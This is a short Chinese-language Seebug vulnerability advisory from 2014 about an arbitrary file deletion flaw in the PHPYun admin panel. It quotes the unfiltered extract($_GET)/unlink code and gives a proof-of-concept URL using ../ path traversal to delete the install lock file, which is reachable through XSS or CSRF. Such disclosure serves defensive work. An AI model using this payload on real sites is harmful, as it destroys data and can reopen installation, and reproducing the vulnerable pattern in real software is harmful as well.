PHPYun任意文件删除漏洞(后台触发)

2014-01-06T00:00:00
ID SSV:93937
Type seebug
Reporter Root
Modified 2014-01-06T00:00:00

Description

简要描述:

PHPYun任意文件删除漏洞

详细说明:

/admin/model/database.class.php,44行开始;

function del_action(){ extract($_GET); $delid=@unlink(CONFIG_PATH."backup/".$sql);

$_GET,$sql没有做过滤,直接可任意删除文件;

漏洞证明:

可利用../等跨目录删除任意文件; 例:http://yun.wooyun.org/admin/index.php?M=database&C=del&sql=../../data/phpyun.lock 结合XSS/CSRF,管理员点击后可以触发;